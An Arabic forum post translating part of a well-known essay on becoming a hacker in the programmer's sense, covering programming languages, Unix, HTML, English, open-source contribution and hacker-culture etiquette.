يوجد لغات أخرى تعتبر مهمة للهاكرز من ضمنها البيرل و ليسب. البيرل مهمة لأسباب عملية، فهي تستخدم للصفحات الديناميكية و يستخدمها مديرين النظم. لذلك حتى لو لم تتعلم البرمجة بلغة بيرل فعليك أن تستطيع فهم الكود المكتوب بها. يستخدم العديد من المبرمجين البيرل بنفس الصورة التي أقترح عليك استخدام البايثون بها لتجنب البرمجة بالسي عندما لا تحتاج إلى هذا القدر من التحكم في مصادر الجهاز. سوف تحتاج أن تفهم الكود الذي يكتبه هؤلاء المبرمجين.


تستحق لغة ليسب لفت الانتباه لها لسبب مختلف، بسبب التجربة الرائعة التي سوف تحظى بها عندما تصل إلى فهم هذه اللغه. هذه الخبرة سوف تجعلك مبرمج أفضل لباقية حياتك حتى لو لم تستخدم هذه اللغه كثيرا. يمكنك اكتساب خبرة بسيطه ببساطه عن طريق كتابة أو تعديل بعض الأنماط لمحرر النصوص emacs.


أفضل اختيا بالطبع أن تتعلم الخمس لغات. البايثون، السي، السي++، الجافا، البيرل، و الليسب. إلى جانب أنهم أهم اللغات للهاكرز فهم يمثلون تعريف بأكثر من تقنية برمجية و كل منهم سوف يعلمك شئ ذو قيمة عاليه.


لا يمكنني شرح كيفية تعلم البرمجة في هذا المقال فهي مهارة معقدة. و لكن يمكنني أن أخبرك بأن الكتب و الدورات لن يؤدوا الغرض. الكثير بل معظم الهاكرز علموا أنفسهم بأنفسهم. يمكنك تعلم شيئ بسيط من الكتب و لكن أهم المهارات سوف تتعلمها فقط عندما تبدأ بممارسة البرمجة. ما سوف يعلمك بالشكل الصحيح هو 1- قراءة الكود البرمجي 2- كتابة الكود البرمجي.


تعلم البرمجة يكاد يكون مثل تعلم أي لغه بشريه حيث أفضل طريقة لتعلم اللغات البشريه هي قراءة بعض ما هو مكتوب من قبل أساتذة تلك اللغات و كتابة بعض الأشياء بنفسك و قراءة المزيد و كتابة المزيد حتى تبدأ كتاباتك في التطور لتصل إلى المستوى الذي تريده.


كان العثور على كود لبرامج جيده صعبا بسبب وجود عدد بسيط من البرامج حرة المصدر ليتمكن الهاكرز من قرائتها و التعديل بها و لكن هذا الشئ قد تغير تماما الآن فالبرامج و نظم التشغيل و أدوات البرمجة مفتوحة المصدر و المبنية من قبل الهاكرز متوفرة الآن و هذا ما ينقلني للنقطة التالية


2- احصل على أحد أنظمة يونكس مفتوحة المصدر و تعلم كيفية تشغيله و استخدامه


سأفترض أن لديك جهاز كمبيوتر أو تستطيع الوصول لجهاز. أهم خطوة يمكن لمبتدئ أخذها للحصول على مهارات الهاكر هي أن يقوم بالحصول على نسخة من نظام التشغيل لينكس أو نظام التشغيل من عائلة BSD و يقوم بتثبيته على جهازه و العمل به.


نعم يوجد أنظمة تشغيل أخرى و لكنها أنظمة مغلقة المصدر و تصل إليك في الشكل النهائي حيث لا يمكنك قراءة الكود المصدري للنظام ولا يمكنك التعديل به. محاولة تعلم الهاك أثناء استخدام نظام التشغيل وندوز أو ماك أو إس يشبه تماما من يحاول تعلم الرقص و هو يرتدي بذله حديدية.


يمكن التعلم باستخدام نظام MacOS X و لكن ليس كل نظام التشغيل مفتوح المصدرللك فسوف تقابل العديد من العقبات. و كن حذا لكي لا يصبح لديك العادة السيئة و هي الاعتماد على الكود مغلق المصدر الخاص بشركة أبل. إذا ركزت على مبادئ اليونكس الموجوده في النظام فسوف تتعلم شسئا مفيداً.


اليونكس هو نظام تشغيل الانترنت. بينما يمكنك تعلم استخدام الانترنت بدون تعلم اليونكس لن يمكنك أن تصبح هاكر انترنت بدون تعلم اليونكس و فهمه. لهذا السبب فثقافة الهاكرز الآن متمركزة بقوة حول اليونكس (لم يكن هذا موجودا من قبل و يوجد بعض الهاكرز القدامى الغير سعيدين بهذا الشئ و لكن الصلة بين اليونكس و الانترنت أصبحت ة لدرجة أن حتى ميكروسوفت ليست بالقوة الكافية لتضعف هذه الصلة).


لذلك قم بجلب نظام تشغيل مثل اليونكس، أنا أفضل اللينكس و لكن يوجد أنظمة أخرى ( نعم يمكنك تثبيت نظامي لينكس و نظام وندوز على نفس الكمبيوتر جنبا إلى جنب). تعلم النظام و قم بالعمل عليه و ادخل على الانترنت عن طريقه. إقرأ الكود و عدل به. سوف تحصل على أدوات أفضل بكثير للبرمجة من أي أدوات يمكن أن تراها على نظام التشغيل وندوز. سوف تحصل على المرح و على الكثير من المعلومات أكثر مما تتخيل أثناء استخدامك و سوف تدرك هذا الشيئ عندما تنظر إلى الوراء لترى ما كنت عليه قبل أن تصبح هاكر.


للمزيد عن اليونكس راجع هذا المقال. يمكن أن تراجع أيضا كتاب The Art Of Unix Programming.


لكي تحصل على نسخة لينكس راجع موقع Linux Online!. يمكنك تحميل نسخة لينكس من هناك و لكن يستحسن أن تبحث عن مجموعة مستخدمي لينكس قريبه منك لتحصل منهم على النسخه و ليساعدوك على تثبيته على جهازك. بالنسبة للمستخدم الجديد فلا يوجد فرق كبير بين توزيعات اللينكس المختلفه.


يمكنك الحصول على المساعده بخصوص نسخ يونكس BSD من الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


لقد قمت بكتابة درس عن مبادئ اليونكس و الانترنت.


ملاحظة: لا أنصح بتثبيت اللينكس أو BSD وحدهما على الجهاز إذا كنت مبتدئ. حاول العثور على مجموعة مستخدمي لينكس لتسألهم المساعده.


3- تعلم كيفية استعمال الورلد وايد ويب و كيفية كتابة HTML


معظم الأشياء التي يقوم بها الهاكرز ليست واضحه و مرئية لغير الهاكرز مثل مساعدة الجامعات و المصانع و المكاتب على العمل. ماعدا الويب، و هو لعبة الهاكرز البراقه التي حتى السياسيين يعترفون بأنهما تحدث تغييرا في العالم و لهذا السبب بالإضافة إلى أسباب لأخرى يجب أن تتعلم كيفية التعامل مع الويب.


لا يعني هذا أن تتعلم كيف تتعامل مع المتصفح ( أي شخص يمكنه فعل هذا) و لكن يجب أن تتعلم كيف تقوم بكتابة صفحات الانترنت بواسطة HTML. إذا لم تكن تعرف كيف تبرمج فعندما تتعلم كتابة الصفحات بواسطة HTML سوف تتعلم بعض العادات التي سوف تساعدك على تعلمالأشياء الأخرى. قم ببناء صفحة خاصه بك. حاول دائما أن تستخدم XHTML و هي أفضل من ال HTML التقليدية. يوجد العديد من الدروس التعليمية الجيده على الانترنت، هذا واحد منها [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


و لكن بناء صفحة على الانترنت لك ليس كافيا لتصبح هاكر. الويب مليئة بالصفحات الشخصية. معظمهم لا جدوى منهم ولا يوجد بهم أي محتوي ذو قيمة و ذو مظهر أبله. للمزيد عن هذا الموضوع راجع صفحة The HTML Hell Page


لكي يصبح لصفحتك قيمة يجب أن يكون بها محتوى يجذب الانتباه أو مفيد للهاكرز الآخرين. و هذا ينقلنا للنقطة التاليه.


4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها


بصفتي أمريكي و لغتي الأم هي الإنجليزية فقد كنت ممتنعا من ذكر هذه الجزئية خشية أن يعتقد البعض أنها إمبريالية حضارية. و لكن قام بعض المتحدثين بلغات أخرى بتحفيزي لذكر أن الانجليزية هي اللغة المعروفة كلغة أساسية لمجتمع الهاكرز و الانترنت و أنك سوف تحتاجها لكي تستطيع التعامل مع مجتمع الهاكرز.


في حوالي سنة 1991 علمت أن العديد من الهاكرزالذين يتحدثون لغات غير الانجليزي يستخدمون الانجليزية في مناقشاتهم التقنية حتى و لو كانت لغتهم الأم واحده. حيث أن اللغة الانجليزية بها مصطلحات تقنية أغنى من أي لغة أخرى و لهذا فهي أسهل في التخاطب في الأمور التقنية. و لذلك فالكتب المترجمة من الانجليزية إلى لغات أخرى ليست بنفس مستوى الكفاءة.


لينوس تورفالدس و هو فنلندي يقوم بكتابة التعليقات على الكود الذي يكتبه بالانجليزية. قدرته على التحدث بالانجليزية لعبت دورا هاماً في قدرته على العمل مع المجتمع الواسع من المطورين على الانترنت لتطوير اللينكس. و هو مثال جدير أن يحتذى به.






المكانة في ثقافة الهاكرز


1- قم بكتابة برامج مفتوحة المصدر
2- ساعد في تجربة و اصلاح البرامج مفتوحة المصدر
3- انشر معلومات مفيدة
4- ساعد على ابقاء البنية التحتية فعاله
5- قم بخدمة ثقافة الهاكرز نفسها


مثل كل الثقافات التي لا تملك اقتصاديات مادية، تقوم ثقافة الهاكرز على السمعة. انت تحاول حل مشكلات شيقة، و لكن إلى أي مدى هي شيقة هذه المشكلات، و هل حلك لهذه المشكلة حل جيد أم لا هي أشياء وحدهم نظرائك المساويين لك في الخبرة أو الأكثر خبرة منك هم الذي يستطيعون تحديدها.


و لذا عندما تمارس الهاك تتعلم أن تحافظ على سجل بما يعتقده بعض الهاكرز من ناحية خبراتك (لهذا لن تصبح هاكر حتى يعتبرك الهاكرز الآخرون هاكر). هذه الحقيقه تبدو محجوبة عن الآخرين بالصورة الظاهرة أن الهاك هو عمل فردي.


يطلق على الهاك بالتحديد حضارة الإهداء. تكتسب السمعه و المكانة بها ليس بالسيطرة على الآخرين ولا بكونك ا ولا بحيازتك لأشياء يريدها الآخرون و لكن بالعطاء. بعطائك للوقت و المجهود و نتيجة إبداعك و مهارتك.


يوجد خمس أشياء أساسية يمكنك أن تقوم بها لتحظى باحترام الهاكرز:


1- قم بكتابة برامج مفتوحة المصدر


أول الأشياء التي يمكنك عملها هو أن تقوم بكتابة برامج يراها الهاكرز الآخرون مفيده أو ممتعه و أن تقوم بنشر الكود الخاص بالبرنامج للمجتمع ليستخدمه.


اعتدنا من قبل أن نسمي هذه البرمجيات "برامج حرة المصدر" و لكن هذه التسمية بالانجليزية سببت الحيرة لبعض الأشخاص بين معنى الحرية و المجانية. معظمنا الآن بنسبة خمسه إلى واحد بناء على تحليل محتويات الويب يفضلون المصطلح برنامج "مفتوح المصدر".


الهاكرز الشهيرين هم من قاموا بكتابة برامج كبيرة و ة و لاقت إقبالا واسعا بين الناس و من ثم منحوا هذه البرامج للعالم بدون مقابل لكي يستخدمها الجميع الآن.


2- ساعد في تجربة و اصلاح البرامج مفتوحة المصدر


في هذا العالم الخالي من أي شئ كامل من الطبيعي أن نجد أن أكثر الوقت الذي نمضيه في تطوير البرامج هو الوقت الذي نمضيه في تتبع الأخطاء و تصحيحها بالبرنامج. لذلك ستجد أن أي مبرمج لبرنامج مفتوح المصدر سيقول لك أن أي مجرب جيد للبرنامج ( الذي يعرف كيف يصف مشكلات البرنامج، يعرف كيف يحدد مصدر المشاكل، و قادر على تتبع خطوات معينه لوصف المشكله) يساوي وزنه ذهبا. يمكن أن يشكل شخص واحد فقط من هذه النوعية فرقا شاسعا بين عملية تتبع و تصحيح الأخطاء المتعبه التي تشبه الكابوس و السهله البسيطه.


إذا كنت مبتدئ فعليك إيجاد برنامج تحت التطوير و كن مختبرا جيدا للبرنامج. هذا هو التطور الطبيعي فبعد ان تساعد في الاختبار و ايجاد الأخطاء ستساعد فيما بعد في تتبعها و إصلاحها و حتى في تعديل البرنامج. سوف تتعلم الكثير بهذا الشكل. و سوف تترك انطباعا جيدا لدى الأشخاص الذين سوف يساعدوك فيما بعد.


3- انشر معلومات مفيدة


أحد الأشياء الأخرى المفيده مثل جمع المعلومات المفيده و تنظيمها في صفحات أو مستندات مثل قوائم الأسئلة المتكررة و جعلها متاحة للجميع.


الأشخاص الذين يقومون بتوفير مثل هذه المستندات التقنيه يحظون بنفس الاحترام تقريبا الذي يحظى به مبرمجو البرامج مفتوحة المصدر.


4- ساعد على ابقاء البنية التحتية فعاله


حضارة الهاكرز مبنية على العمل التطوعي. هناك العديد من الأعمال المهمة للغاية و في نفس الوقت لا تسلط الأضواء عليها مثل إدارة القوائم البريدية، إدارة المجموعات الإخبارية، إدارة مواقع أرشفة البرامج، تطوير مستندات RFC و غيرها من المقاييس التقنية.


الناس الذين يقومون بهذه الأعمال يحظون بقدر عالي من الاحترام، لأن كل الناس على علم بأن هذه الأعمال تحتاج إلى وقت كبير و ليست ممتعه مثل كتابة البرامج. القيام بهذه الأعمال يظهر الإخلاص و التفاني.


5- قم بخدمة ثقافة الهاكرز نفسها


أخيرا خدمة ثقافة الهاكرز نفسها. (مثلا بكتابة مستند كيف تصبح هاكر :-)). و هذا الشيئ لن تستطيع فعله قبل أن تختلط بالمجتمع لفترة و أن تعرف بشيئ من الأربعه السابقين.


لا يوجد قادة لحضارة الهاكرز. و لكن هناك أبطال و كبار في السن و خطباء و مؤرخين. عندما تصبح عضوا في مجتمع الهاكرز لفترة كافية قد تصبح واحدا من هؤلاء. و لكن إحذر فالهاكرز لا يثقون في من لديه تفاخر بنفسه زائد عن اللزوم. لذلك فالمحاولة للوصول إلى هذه المكانة من الشهره بشكل واضح أمر خطر. بدلا من الركض وراء المكانه يجب أن تحاول الابتعاد عنها حتى تصل إليك بنفسها. و عندها كن متواضعا بالنسبة لما وصلت إليه






علاقة الهاكرز بالمنعزلين عن الحياة العامة (Nerds)


على النقيض تماما من الصورة التي لدى الناس عن الهاكرز. لا يجب أن تكون منعزلا عن الناس و الحياة العامه لتكون هاكر. قد يساعدك هذا لتكون هاكر و بالفعل هناك العديد من الهاكرز المنطوين و المنعزلين فهذا يساعد على التركيز على التعلم و العمل الجدي.


و لهذا السبب تبنى العديد من الهاكرز لقب Nerd بل و يستخدم البعض اللقب الأكثر شدة Geek. و هي طريقتهم لإعلان استقلالهم عن التوقعات الاجتماعية العادية لدى الناس. راجع صفحة الجييكس للمزيد.


إذا استطعت أن تركز على الهاك و الحفاظ على حياة جيده فلا بأس بهذا. و قد أصبح هذا أكثر سهولة من الوقت الذي كنت فيه مبتدأ في أوائل السبعينيات. و يوجد الآن أشخاص يدركون أن الهاكرز عادة ما يكونوا أزواج و محبين ين .


و إذا كنت منجذبا للهاك بسبب انعزالك فلا بأس بذلك أيضا. على الأقل لن تصادفك مشاكل في التركيز. و ربما تجد حياة أفضل فيما بعد.






أشياء للمظهر


لكي تصبح هاكر يجب أن تفكر بعقلية الهاكر. يوجد بعض الأشياء التي قد تساعدك على هذا عندما لا تكون جالسا أمام الحاسب الآلي. هذه الأشياء ليست بديلا عن الهاك (ولا يوجد بديل عنه) و لكن العديد من الهاكرز يقومون بتلك الأشياء و يشعرون أنهم بهذه الطريقه يصبحون متصلين مع قلب الهاك.


* تعلم الكتابه بلغتك الأم. بالرغم من أن أغلب الناس يعتقدون أن الهاكرز لا يستطيعون الكتابه، يوجد عدد كبير من الهاكرز لديهم قدرات جيده على الكتابه.
* إقرأ روايات الخيال العلمي.
* تعلم فنون الدفاع عن النفس. الانضباط العقلي المطلوب لمثل هذه الألعاب الرياضية مشابه للمطلوب من الهاكر. الأكثر شهرة هو بالتأكيد فن القتال الآسيوي باليد الخاليه مثل التايكوندو، الكاراتيه، الوينج شون، الأيكيدو، أو الجو جيتسو. القتال بالسيوف الآسيوية لديه بعض الهواة. و في الأماكن الذي تعد فيه هذه النشاطات قانونية أصبح إطلاق النار منتشرا منذ أواخر التسعينات. أكثر هذه الفنون قربا للهاكر هي التي تتطلب الانضباط العقلي، الاسترخاء الحذر، التحكم و ليس القوة العضلية.
*إيجاد طريقة مناسبة لك للتأمل
*تعلم تقدير أنواع غير اعتيادية من الموسيقى. تعلم العزف على أي آلة موسيقية.
*التلاعب بالألفاظ و التورية في الحديث


كلما زادت الأشياء التي تقوم بفعلها من ضمن هذه القائمة كلما كنت قريبا من عقلية الهاكرز. لا ندري بالتحديد لماذا هذه الأشياء و لكن كلها متصله ببعضها من حيث النشاط بنصفي المخ الأيمن و الأيسر. يحتاج الهاكرز إلى التصرف بمنطقية في لحظة و في اللحظة التاليه يخرجوا عن حدود المنطق.


أخيرا هناك بعض الأشياء التي يجب أن لا تفعلها:


*لا تستخدم أسماء رمزية جذابه أو سخيفة على الانترنت
* لا تدخل في مشادات و مشاحنات تافهة على الانترنت
* لا تسمي نفسك Cyberpunk ولا تضيع وقتك على أي شخص يسمي نفسه باسم كهذا
* لا تقم بإرسال موضوع أو رساله بريدية مليئة بالأخطاء الإملائية


السمعه الوحيده التي ستكتسبها إذا فعلت أي من هذه الأشياء هي أنك أحمق. لاحظ أن الهاكرز لديهم ذاكرة ة، قد يتطلب الأمر سنوات لكي ينسى الهاكرز ما فعلته من قبل و يقبلوك بينهم.


يجب أن أوضح المشكله بالنسبة للأسماء الرمزية، إخفاء هويتك وراء إسم رمزي هو تصرف سخيف معروف لدى الكراكرز و لصوص البرامج و غيرهم من الأشخاص البلهاء. لا يقوم الهاكرز بهذا الفعل فهم فخورون بما يقومون به و يريدون أن تبقى أعمالهم متصلة بأسمائهم الحقيقية. لذا فإن كان لك اسم رمزي تخلى عنه فلن تعتبر إلا فاشل بهذا الاسم الرمزي في مجتمع الهاكرز
من فضلكم أرجوا الرد لأني تعبت في الموضوع
أرجو التثبيت


الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
من اسرار المحترفين فى النت
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 3انتقل الى الصفحة : 1, 2, 3  الصفحة التالية
 مواضيع مماثلة
-
» هل تعلم ما هى اسرار الكتابه
» من اسرار الخط العربى
» بعد انتشار الرخامه الكاسحه على صفحات النت

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات برعى لفن الخــــــــط العــــــربى Arabic Calligraphy :: قسم الجرافيك والبرامج-
انتقل الى: